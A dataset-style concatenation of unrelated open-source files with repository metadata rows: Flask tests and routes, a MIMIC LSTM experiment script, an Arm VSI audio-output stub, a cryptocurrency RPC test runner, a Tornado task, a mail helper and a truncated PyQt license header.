        self.assertEqual(response.status_code,200)
    def test_delete_get(self):
        response = self.client.get(url_for('delete', id=1), follow_redirects=True)
        self.assertEqual(response.status_code,200)
class TestRead(TestBase):
    """Verify that seeded data is rendered on the home page."""
    def test_read_tasks(self):
        """The team inserted by setUp should appear on the home page."""
        page = self.client.get(url_for("home"))
        self.assertIn(b"team name", page.data)
class TestCreate(TestBase):
    """Exercise the /create POST route."""
    def test_create_task(self):
        """POSTing a new team should render its name and sponsor."""
        form = {"team_name": "New team", "sponsor": "Emirates"}
        page = self.client.post(url_for("create"), data=form,
            follow_redirects=True)
        self.assertIn(b"New team", page.data)
        self.assertIn(b"Emirates", page.data)
class TestUpdate(TestBase):
    """Exercise the /update/<id> POST route."""
    def test_update_task(self):
        """Updating team 1 should render the new name and sponsor."""
        response = self.client.post(url_for("update", id=1),
            data=dict(team_name="Updated name", sponsor="updated sponsor"),
            follow_redirects=True
            )
        self.assertIn(b"Updated name", response.data)
        self.assertIn(b"updated sponsor", response.data)
class TestAdd(TestBase):
    """Exercise the /add/<id> POST route (add a player to a team)."""
    def test_add_task(self):
        """Adding a player to team 1 should render all submitted fields."""
        response = self.client.post(url_for("add", id=1),
            data=dict(name="add name", position='CM', club='club', height='1.77'),
            follow_redirects=True
            )
        self.assertIn(b"add name", response.data)
        self.assertIn(b"CM", response.data)
        self.assertIn(b"club", response.data)
        self.assertIn(b"1.77", response.data)
class TestDelete(TestBase):
def test_update_task(self):
response = self.client.get(url_for("delete", id=1),
follow_redirects=True
)
self.assertNotIn(b"team name", response.data)
self.assertNotIn(b"Emirates", response.data) | [
"hitesh70738@gmail.com"
] | hitesh70738@gmail.com |
61f7e1110562904492dddc8c101dfdb04a9f0b79 | 2009735d19318a3ffe8e56687efb8e7688ebaf5a | /models/final_experiment_scripts/MIMIC/LoS/channel_wise_lstm.py | 672a261444acf134a165a8bd320b316b08fb5d3f | [
"MIT"
] | permissive | weikunzz/TPC-LoS-prediction | 7bb9865e2f0fa3b461cb6fc23ed49996bfba59c1 | 30770f3e75d6a2a725c422b837f7ec864708f5d9 | refs/heads/master | 2023-04-06T10:19:12.284137 | 2021-04-08T14:06:53 | 2021-04-08T14:06:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | from eICU_preprocessing.split_train_test import create_folder
from models.run_lstm import BaselineLSTM
from models.initialise_arguments import initialise_lstm_arguments
from models.final_experiment_scripts.best_hyperparameters import best_cw_lstm
if __name__=='__main__':
c = initialise_lstm_arguments()
c['exp_name'] = 'ChannelwiseLSTM'
c['dataset'] = 'MIMIC'
c = best_cw_lstm(c)
log_folder_path = create_folder('models/experiments/final/MIMIC/LoS', c.exp_name)
channelwise_lstm = BaselineLSTM(config=c,
n_epochs=c.n_epochs,
name=c.exp_name,
base_dir=log_folder_path,
explogger_kwargs={'folder_format': '%Y-%m-%d_%H%M%S{run_number}'})
channelwise_lstm.run() | [
"ecr38@cam.ac.uk"
] | ecr38@cam.ac.uk |
828e36ca6a8ff4e76f37661719c06a120b754ff2 | f42f4835eaeb0e1b6e19a7d56ba96673f532587a | /VSI/audio/python/arm_vsi1.py | db933c222a90918459468f754d1f778f7f9a52ba | [
"Apache-2.0"
] | permissive | Envoid/VHT-TFLmicrospeech | 20b8ed9ec1cdc775bc3c7764cc91f23f618ce92e | 3928718dd89e1f394c0288a0a9ba80e00dcdf01c | refs/heads/main | 2023-08-29T19:12:57.678718 | 2021-10-07T06:05:13 | 2021-10-07T06:05:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,102 | py | # Copyright (c) 2021 Arm Limited. All rights reserved.
# Virtual Streaming Interface instance 1 Python script: Audio Output
##@addtogroup arm_vsi1_py_audio_out
# @{
#
##@package arm_vsi1_audio_out
#Documentation for VSI Audio Output module.
#
#More details.
import logging
import wave
## Set verbosity level
#verbosity = logging.DEBUG
verbosity = logging.ERROR
# [debugging] Verbosity settings
level = { 10: "DEBUG", 20: "INFO", 30: "WARNING", 40: "ERROR" }
logging.basicConfig(format='Py: VSI1: [%(levelname)s]\t%(message)s', level = verbosity)
logging.info("Verbosity level is set to " + level[verbosity])
# IRQ registers
IRQ_Status = 0
# Timer registers
Timer_Control = 0
Timer_Interval = 0
# Timer Control register definitions
Timer_Control_Run_Msk = 1<<0
Timer_Control_Periodic_Msk = 1<<1
Timer_Control_Trig_IRQ_Msk = 1<<2
Timer_Control_Trig_DMA_Msk = 1<<3
# DMA registers
DMA_Control = 0
# DMA Control register definitions
DMA_Control_Enable_Msk = 1<<0
DMA_Control_Direction_Msk = 1<<1
DMA_Control_Direction_P2M = 0<<1
DMA_Control_Direction_M2P = 1<<1
# User registers
Regs = [0] * 64
CONTROL = 0 # Regs[0]
CHANNELS = 0 # Regs[1]
SAMPLE_BITS = 0 # Regs[2]
SAMPLE_RATE = 0 # Regs[3]
# User CONTROL register definitions
CONTROL_ENABLE_Msk = 1<<0
# Data buffer
Data = bytearray()
# Audio Frames
AudioFrames = bytearray()
## Open WAVE file (store object into global WAVE object)
# @param name name of WAVE file to open
def openWAVE(name):
    """Open *name* for writing and configure it from the user registers.

    Uses the global CHANNELS, SAMPLE_BITS and SAMPLE_RATE values; the
    resulting writer is stored in the global WAVE object.
    """
    global WAVE
    logging.info("Open WAVE file (write mode): {}".format(name))
    WAVE = wave.open(name, 'wb')
    WAVE.setnchannels(CHANNELS)
    # Round the sample width up to whole bytes.
    WAVE.setsampwidth((SAMPLE_BITS + 7) // 8)
    WAVE.setframerate(SAMPLE_RATE)
    logging.info(" Number of channels: {}".format(CHANNELS))
    logging.info(" Sample bits: {}".format(SAMPLE_BITS))
    logging.info(" Sample rate: {}".format(SAMPLE_RATE))
## Write WAVE frames (global WAVE object) from global AudioFrames object
def writeWAVE():
    """Append the frames buffered in the global AudioFrames to the open WAVE file."""
    logging.info("Write WAVE frames")
    WAVE.writeframes(AudioFrames)
## Close WAVE file (global WAVE object)
def closeWAVE():
    """Close the WAVE file previously opened by openWAVE()."""
    logging.info("Close WAVE file")
    WAVE.close()
## Store audio frames from global Data buffer
# @param block_size size of block to store (in bytes)
def storeAudioFrames(block_size):
    """Copy the DMA Data buffer into AudioFrames and flush it to the WAVE file.

    @param block_size size of the block to store (in bytes)
    """
    global AudioFrames, Data
    logging.info("Store audio frames from data buffer")
    frame_size = CHANNELS * ((SAMPLE_BITS + 7) // 8)
    frames_max = block_size // frame_size
    # NOTE(review): frame_size/frames_max are computed but never used; the
    # whole Data buffer is stored regardless of block_size - confirm intent.
    AudioFrames = Data
    writeWAVE()
## Initialize
def init():
    """VSI callback: one-time initialization hook (nothing to set up here)."""
    logging.info("Python function init() called")
## Read interrupt request (the VSI IRQ Status Register)
# @return value value read (32-bit)
def rdIRQ():
    """VSI callback: read the IRQ Status register.

    @return current 32-bit IRQ status value
    """
    global IRQ_Status
    logging.info("Python function rdIRQ() called")
    value = IRQ_Status
    logging.debug("Read interrupt request: {}".format(value))
    return value
## Write interrupt request (the VSI IRQ Status Register)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrIRQ(value):
    """VSI callback: write the IRQ Status register.

    @param value 32-bit value to store
    @return the value that was written
    """
    global IRQ_Status
    logging.info("Python function wrIRQ() called")
    IRQ_Status = value
    logging.debug("Write interrupt request: %s", value)
    return value
## Write Timer registers (the VSI Timer Registers)
# @param index Timer register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrTimer(index, value):
    """VSI callback: write one of the VSI Timer registers.

    Index 0 is Timer_Control, index 1 is Timer_Interval; any other index
    is ignored. The written value is always echoed back.
    """
    global Timer_Control, Timer_Interval
    logging.info("Python function wrTimer() called")
    if index == 0:
        Timer_Control = value
        logging.debug("Write Timer_Control: %s", value)
    elif index == 1:
        Timer_Interval = value
        logging.debug("Write Timer_Interval: %s", value)
    return value
## Timer event (called at Timer Overflow)
def timerEvent():
    """VSI callback: invoked at every timer overflow (no action required)."""
    logging.info("Python function timerEvent() called")
## Write DMA registers (the VSI DMA Registers)
# @param index DMA register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrDMA(index, value):
    """VSI callback: write a DMA register (only index 0, DMA_Control, exists).

    @return the value that was written
    """
    global DMA_Control
    logging.info("Python function wrDMA() called")
    if index == 0:
        DMA_Control = value
        logging.debug("Write DMA_Control: %s", value)
    return value
## Read data from peripheral for DMA P2M transfer (VSI DMA)
# @param size size of data to read (in bytes, multiple of 4)
# @return data data read (bytearray)
def rdDataDMA(size):
    """VSI callback: return *size* bytes for a peripheral-to-memory DMA burst.

    Bytes past the end of the current Data buffer are zero-filled.
    """
    global Data
    logging.info("Python function rdDataDMA() called")
    out = bytearray(size)
    count = min(len(Data), size)
    out[:count] = Data[:count]
    logging.debug("Read data ({} bytes)".format(size))
    return out
## Write data to peripheral for DMA M2P transfer (VSI DMA)
# @param data data to write (bytearray)
# @param size size of data to write (in bytes, multiple of 4)
def wrDataDMA(data, size):
    """VSI callback: accept a memory-to-peripheral DMA block.

    Stores *data* in the global buffer and appends it to the WAVE file
    via storeAudioFrames().

    @param data bytearray written by the DMA
    @param size size of the transfer in bytes (multiple of 4)
    """
    global Data
    logging.info("Python function wrDataDMA() called")
    Data = data
    logging.debug("Write data ({} bytes)".format(size))
    storeAudioFrames(size)
    return
## Write CONTROL register (user register)
# @param value value to write (32-bit)
def wrCONTROL(value):
    """Handle a write to the user CONTROL register.

    Opens the output WAVE file when the ENABLE bit rises and closes it
    when the bit falls; writes that do not change the bit are ignored.

    @param value value to write (32-bit)
    """
    global CONTROL
    # XOR with the previous value detects a transition of the ENABLE bit.
    if ((value ^ CONTROL) & CONTROL_ENABLE_Msk) != 0:
        if (value & CONTROL_ENABLE_Msk) != 0:
            logging.info("Enable Transmitter")
            openWAVE('test.wav')
        else:
            logging.info("Disable Transmitter")
            closeWAVE()
    CONTROL = value
## Write CHANNELS register (user register)
# @param value value to write (32-bit)
def wrCHANNELS(value):
    """VSI user-register callback: record the number of audio channels."""
    global CHANNELS
    CHANNELS = value
    logging.info("Number of channels: %s", value)
## Write SAMPLE_BITS register (user register)
# @param value value to write (32-bit)
def wrSAMPLE_BITS(value):
    """VSI user-register callback: record the sample width in bits."""
    global SAMPLE_BITS
    SAMPLE_BITS = value
    logging.info("Sample bits: %s", value)
## Write SAMPLE_RATE register (user register)
# @param value value to write (32-bit)
def wrSAMPLE_RATE(value):
    """VSI user-register callback: record the sample rate in Hz."""
    global SAMPLE_RATE
    SAMPLE_RATE = value
    logging.info("Sample rate: %s", value)
## Read user registers (the VSI User Registers)
# @param index user register index (zero based)
# @return value value read (32-bit)
def rdRegs(index):
    """VSI callback: read a user register.

    @param index zero-based user register index
    @return the register's current 32-bit value
    """
    global Regs
    logging.info("Python function rdRegs() called")
    value = Regs[index]
    logging.debug("Read user register at index {}: {}".format(index, value))
    return value
## Write user registers (the VSI User Registers)
# @param index user register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrRegs(index, value):
    """VSI callback: write a user register, dispatching side effects first.

    Indices 0-3 route through the CONTROL / CHANNELS / SAMPLE_BITS /
    SAMPLE_RATE handlers before the raw value is stored in Regs.

    @param index zero-based user register index
    @param value 32-bit value to write
    @return the value written
    """
    global Regs
    logging.info("Python function wrRegs() called")
    if index == 0:
        wrCONTROL(value)
    elif index == 1:
        wrCHANNELS(value)
    elif index == 2:
        wrSAMPLE_BITS(value)
    elif index == 3:
        wrSAMPLE_RATE(value)
    Regs[index] = value
    logging.debug("Write user register at index {}: {}".format(index, value))
    return value
## @}
| [
"robert.rostohar@arm.com"
] | robert.rostohar@arm.com |
dbcf0d7a4a2c281299369fafdd1f56bb32569b62 | a0369b03a6da17571a58d55b777a748abd7efba2 | /qa/pull-tester/rpc-tests.py | 75f7efa89b488d2028217f6251b3efb06d098c54 | [
"MIT"
] | permissive | bestsoftdevelop777/BitrityOfficial | 25dbb0bef4273f2453dc74900b5da5abd753d820 | 17f8780a36e4be0cec0f69be15ae489247153a26 | refs/heads/master | 2023-03-07T08:15:53.461305 | 2018-08-10T18:41:56 | 2018-08-10T18:41:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,791 | py | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Run Regression Test Suite
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts, other
than:
- `-extended`: run the "extended" test suite in addition to the basic one.
- `-win`: signal that this is running in a Windows environment, and we
should run the tests.
- `--coverage`: this generates a basic coverage report for the RPC
interface.
For a description of arguments recognized by test scripts, see
`qa/pull-tester/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
sys.path.append("qa/pull-tester/")
from tests_config import *
BOLD = ("","")
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
RPC_TESTS_DIR = SRCDIR + '/qa/rpc-tests/'
#If imported values are not defined then set to zero (or disabled)
if 'ENABLE_WALLET' not in vars():
ENABLE_WALLET=0
if 'ENABLE_BITCOIND' not in vars():
ENABLE_BITCOIND=0
if 'ENABLE_UTILS' not in vars():
ENABLE_UTILS=0
if 'ENABLE_ZMQ' not in vars():
ENABLE_ZMQ=0
# python-zmq may not be installed. Handle this gracefully and with some helpful info
if ENABLE_ZMQ:
try:
import zmq
except ImportError:
print("WARNING: \"import zmq\" failed. Setting ENABLE_ZMQ=0. " \
"To run zmq tests, see dependency info in /qa/README.md.")
ENABLE_ZMQ=0
ENABLE_COVERAGE=0
#Create a set to store arguments and create the passon string
opts = set()
passon_args = []
PASSON_REGEX = re.compile("^--")
PARALLEL_REGEX = re.compile('^-parallel=')
print_help = False
run_parallel = 4
for arg in sys.argv[1:]:
if arg == "--help" or arg == "-h" or arg == "-?":
print_help = True
break
if arg == '--coverage':
ENABLE_COVERAGE = 1
elif PASSON_REGEX.match(arg):
passon_args.append(arg)
elif PARALLEL_REGEX.match(arg):
run_parallel = int(arg.split(sep='=', maxsplit=1)[1])
else:
opts.add(arg)
#Set env vars
if "BITYD" not in os.environ:
os.environ["BITYD"] = BUILDDIR + '/src/bitrityd' + EXEEXT
if EXEEXT == ".exe" and "-win" not in opts:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print("Win tests currently disabled by default. Use -win option to enable")
sys.exit(0)
if not (ENABLE_WALLET == 1 and ENABLE_UTILS == 1 and ENABLE_BITCOIND == 1):
print("No rpc tests to run. Wallet, utils, and bitcoind must all be enabled")
sys.exit(0)
# python3-zmq may not be installed. Handle this gracefully and with some helpful info
if ENABLE_ZMQ:
try:
import zmq
except ImportError:
print("ERROR: \"import zmq\" failed. Set ENABLE_ZMQ=0 or "
"to run zmq tests, see dependency info in /qa/README.md.")
# ENABLE_ZMQ=0
raise
testScripts = [
# longest test should go first, to favor running tests in parallel
'wallet-hd.py',
'walletbackup.py',
# vv Tests less than 5m vv
'p2p-fullblocktest.py', # NOTE: needs dash_hash to pass
'fundrawtransaction.py',
'fundrawtransaction-hd.py',
# vv Tests less than 2m vv
'wallet.py',
'wallet-accounts.py',
'wallet-dump.py',
'listtransactions.py',
# vv Tests less than 60s vv
'sendheaders.py', # NOTE: needs dash_hash to pass
'zapwallettxes.py',
'importmulti.py',
'mempool_limit.py',
'merkle_blocks.py',
'receivedby.py',
'abandonconflict.py',
'bip68-112-113-p2p.py',
'rawtransactions.py',
'reindex.py',
# vv Tests less than 30s vv
'mempool_resurrect_test.py',
'txn_doublespend.py --mineblock',
'txn_clone.py',
'getchaintips.py',
'rest.py',
'mempool_spendcoinbase.py',
'mempool_reorg.py',
'httpbasics.py',
'multi_rpc.py',
'proxy_test.py',
'signrawtransactions.py',
'nodehandling.py',
'addressindex.py',
'timestampindex.py',
'spentindex.py',
'decodescript.py',
'blockchain.py',
'disablewallet.py',
'keypool.py',
'keypool-hd.py',
'p2p-mempool.py',
'prioritise_transaction.py',
'invalidblockrequest.py', # NOTE: needs dash_hash to pass
'invalidtxrequest.py', # NOTE: needs dash_hash to pass
'p2p-versionbits-warning.py',
'preciousblock.py',
'importprunedfunds.py',
'signmessages.py',
'nulldummy.py',
'import-rescan.py',
'rpcnamedargs.py',
'listsinceblock.py',
'p2p-leaktests.py',
'p2p-compactblocks.py',
]
if ENABLE_ZMQ:
testScripts.append('zmq_test.py')
testScriptsExt = [
# 'pruning.py', # Prune mode is incompatible with -txindex.
# vv Tests less than 20m vv
'smartfees.py',
# vv Tests less than 5m vv
'maxuploadtarget.py',
'mempool_packages.py',
# vv Tests less than 2m vv
'bip68-sequence.py',
'getblocktemplate_longpoll.py', # FIXME: "socket.error: [Errno 54] Connection reset by peer" on my Mac, same as https://github.com/bitcoin/bitcoin/issues/6651
'p2p-timeouts.py',
# vv Tests less than 60s vv
'bip9-softforks.py',
'rpcbind_test.py',
# vv Tests less than 30s vv
'bip65-cltv.py',
'bip65-cltv-p2p.py', # NOTE: needs dash_hash to pass
'bipdersig-p2p.py', # NOTE: needs dash_hash to pass
'bipdersig.py',
'getblocktemplate_proposals.py',
'txn_doublespend.py',
'txn_clone.py --mineblock',
'forknotify.py',
'invalidateblock.py',
'maxblocksinflight.py',
'p2p-acceptblock.py', # NOTE: needs dash_hash to pass
# 'replace-by-fee.py', # RBF is disabled in Bitrity Core
]
def runtests():
test_list = []
if '-extended' in opts:
test_list = testScripts + testScriptsExt
elif len(opts) == 0 or (len(opts) == 1 and "-win" in opts):
test_list = testScripts
else:
for t in testScripts + testScriptsExt:
if t in opts or re.sub(".py$", "", t) in opts:
test_list.append(t)
if print_help:
# Only print help of the first script and exit
subprocess.check_call((RPC_TESTS_DIR + test_list[0]).split() + ['-h'])
sys.exit(0)
coverage = None
if ENABLE_COVERAGE:
coverage = RPCCoverage()
print("Initializing coverage directory at %s\n" % coverage.dir)
flags = ["--srcdir=%s/src" % BUILDDIR] + passon_args
flags.append("--cachedir=%s/qa/cache" % BUILDDIR)
if coverage:
flags.append(coverage.flag)
if len(test_list) > 1 and run_parallel > 1:
# Populate cache
subprocess.check_output([RPC_TESTS_DIR + 'create_cache.py'] + flags)
#Run Tests
max_len_name = len(max(test_list, key=len))
time_sum = 0
time0 = time.time()
job_queue = RPCTestHandler(run_parallel, test_list, flags)
results = BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "PASSED", "DURATION") + BOLD[0]
all_passed = True
for _ in range(len(test_list)):
(name, stdout, stderr, passed, duration) = job_queue.get_next()
all_passed = all_passed and passed
time_sum += duration
print('\n' + BOLD[1] + name + BOLD[0] + ":")
print('' if passed else stdout + '\n', end='')
print('' if stderr == '' else 'stderr:\n' + stderr + '\n', end='')
results += "%s | %s | %s s\n" % (name.ljust(max_len_name), str(passed).ljust(6), duration)
print("Pass: %s%s%s, Duration: %s s\n" % (BOLD[1], passed, BOLD[0], duration))
results += BOLD[1] + "\n%s | %s | %s s (accumulated)" % ("ALL".ljust(max_len_name), str(all_passed).ljust(6), time_sum) + BOLD[0]
print(results)
print("\nRuntime: %s s" % (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
print("Cleaning up coverage data")
coverage.cleanup()
sys.exit(not all_passed)
class RPCTestHandler:
"""
Trigger the testscrips passed in via the list.
"""
def __init__(self, num_tests_parallel, test_list=None, flags=None):
assert(num_tests_parallel >= 1)
self.num_jobs = num_tests_parallel
self.test_list = test_list
self.flags = flags
self.num_running = 0
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
self.portseed_offset = int(time.time() * 1000) % 625
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
t = self.test_list.pop(0)
port_seed = ["--portseed={}".format(len(self.test_list) + self.portseed_offset)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
self.jobs.append((t,
time.time(),
subprocess.Popen((RPC_TESTS_DIR + t).split() + self.flags + port_seed,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
while True:
# Return first proc that finishes
time.sleep(.5)
for j in self.jobs:
(name, time0, proc, log_out, log_err) = j
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [l.read().decode('utf-8') for l in (log_out, log_err)]
log_out.close(), log_err.close()
passed = stderr == "" and proc.returncode == 0
self.num_running -= 1
self.jobs.remove(j)
return name, stdout, stderr, passed, int(time.time() - time0)
print('.', end='', flush=True)
class RPCCoverage(object):
"""
Coverage reporting utilities for pull-tester.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: qa/rpc-tests/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `qa/rpc-tests/test-framework/coverage.py`
REFERENCE_FILENAME = 'rpc_interface.txt'
COVERAGE_FILE_PREFIX = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, REFERENCE_FILENAME)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(COVERAGE_FILE_PREFIX):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
runtests()
| [
"vangyangpao@gmail.com"
] | vangyangpao@gmail.com |
0d7102130db2739bb99c1c008e466724c33ed4b7 | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/messagepush/task/subscribe.py | be4fdbc0be1cdda9998b0a83fc02a876b7637185 | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | # -*- coding: utf-8 -*-
import logging
import tornado
from core.subscribe import subscrible_direct
request_log = logging.getLogger("ms.request")
class SubscribeTask(tornado.ioloop.PeriodicCallback):
def __init__(self, application, callback_time):
super(SubscribeTask, self).__init__(self.run, callback_time)
self.application = application
self.master = self.application.sentinel.master_for('madeira')
@tornado.gen.coroutine
def run(self):
# TODO: try
try:
r = self.master
# TODO: return types is empty
types = r.smembers('types')
if types is None:
self.finish('type空')
elif types is not None:
msg_type = r.spop('types')
func = self.application.config['subscrible'].get(msg_type)
request_log.info('GET TASK_MESSAGE %s %s %s', types, msg_type, func)
if func == 'direct':
yield subscrible_direct(self.application, msg_type)
except:
request_log.exception('FAIL')
| [
"lescpsn@aliyun.com"
] | lescpsn@aliyun.com |
745600672d996d6b00859d9699a4b2c35ddc8518 | a3b13b2ffa8a353276cd4a8e1a14f2ca593277af | /app/main/routes.py | 0c2d8fee5ac5c71dee54d5d5fa9b22b4789f153b | [
"MIT"
] | permissive | anlance/cdut2016 | ae8db458b2d8ecea80ff6d2d4e890a5acc9e7003 | 4f96b92d83a4bfc051b7b04ebdd5740aaed623a1 | refs/heads/master | 2022-12-09T12:31:00.211656 | 2019-02-20T13:45:44 | 2019-02-20T13:45:44 | 146,073,304 | 0 | 0 | MIT | 2022-12-08T02:58:55 | 2018-08-25T06:58:15 | Python | UTF-8 | Python | false | false | 2,365 | py | from datetime import datetime
from flask import render_template, flash, redirect, request, url_for, jsonify, json
from flask_login import current_user, login_required
import re
from app import db
from app.forms import DiscussForm
from app.main import bp
from app.models import User, Discuss, AnnounceModel
from app.news_cdut.models import NewsCdut
from app.spider.cdut import init_news
from app.spider.today import get_today
@bp.before_request
@login_required
def before_request():
if current_user.is_authenticated:
current_user.last_seen = datetime.now()
db.session.commit()
@bp.route('/', methods=['GET', 'POST'])
@bp.route('/index', methods=['GET', 'POST'])
@login_required
def index():
discuss_form = DiscussForm()
news_cduts, all_count = init_news()
news_cdut = news_cduts[-7:-1]
notices = AnnounceModel.query.filter().order_by(AnnounceModel.up_time.desc()).limit(6)
user_said = Discuss.query.filter(Discuss.id > 1).all()
today = get_today()
thisdate = datetime.now()
thisdatetime = datetime.now()
return render_template('index.html', title='Home Page', news_cdut=news_cdut, today=today, user_said=user_said, discuss_form=discuss_form, notices=notices, date=thisdate,datetime=thisdatetime,re=re)
@bp.route('/add_discuss', methods=['POST'])
@login_required
def add_discuss():
data = json.loads(request.form.get('data'))
username = data['username']
said = data['said']
try:
discuss = Discuss(username=username, said=said)
db.session.add(discuss)
db.session.commit()
except Exception as err:
flash(err+":发送失败", 'info')
user_said = Discuss.query.filter(Discuss.id > 1).all()
return jsonify({"success": 200, "user_said": [i.serialize() for i in user_said]})
@bp.route('/announce/more', methods=['GET', 'POST'])
def more():
page = request.args.get('page', 1, type=int)
announce_models = AnnounceModel.query.order_by(AnnounceModel.up_time.desc()).paginate(page, 10, False)
next_url = url_for('news_cdut.more', page=announce_models.next_num) if announce_models.has_next else None
prev_url = url_for('news_cdut.more', page=announce_models.prev_num) if announce_models.has_prev else None
return render_template('announces/more.html', announces=announce_models.items, next_url=next_url, prev_url=prev_url)
| [
"anlan1996@qq.com"
] | anlan1996@qq.com |
56b4c3dd8ee6578ff8fd4df7d45d128709517dc9 | 6f133957d939ab88f16af4ff2b897c7796f5e7da | /wtxlog/utils/email.py | 7d968047108920c982d4efa0ad9b216b170c2de9 | [] | no_license | xtmhm2000/wtxlog | 25786b0fec99c2f293c7dd4165bfb5456c7549dd | 2de18c91c6125fcd2fdc478d7cfe3cb9b40599ff | refs/heads/master | 2021-01-17T05:45:27.129052 | 2015-02-09T06:06:39 | 2015-02-09T06:06:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 691 | py | from threading import Thread
from flask import current_app
from flask.ext.mail import Message
from ..ext import mail
from .helpers import render_template
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['APP_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['APP_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
| [
"digwtx@ubuntu.(none)"
] | digwtx@ubuntu.(none) |
fbefcb0112cca43cc7b8a399c2dde0d4ca329f56 | 182c651a9b00b9b4d80e6d51ae574cb793958cd6 | /widgets/stylesheet/stylesheet.py | f9c37d6886961ae308ad487c3780ee79e8573ba3 | [] | no_license | eudu/pyqt-examples | c61a7108e1fbfcf2cd918a0f99e9a5a90a3f305c | 8e533b7b3c5e9bbe0617ef1ecb9b169dd216c181 | refs/heads/master | 2020-03-16T01:23:19.573347 | 2018-05-06T20:20:57 | 2018-05-06T20:20:57 | 132,438,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,546 | py | #!/usr/bin/python3
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited
## Copyright (C) 2010 Hans-Peter Jansen <hpj@urpla.net>.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
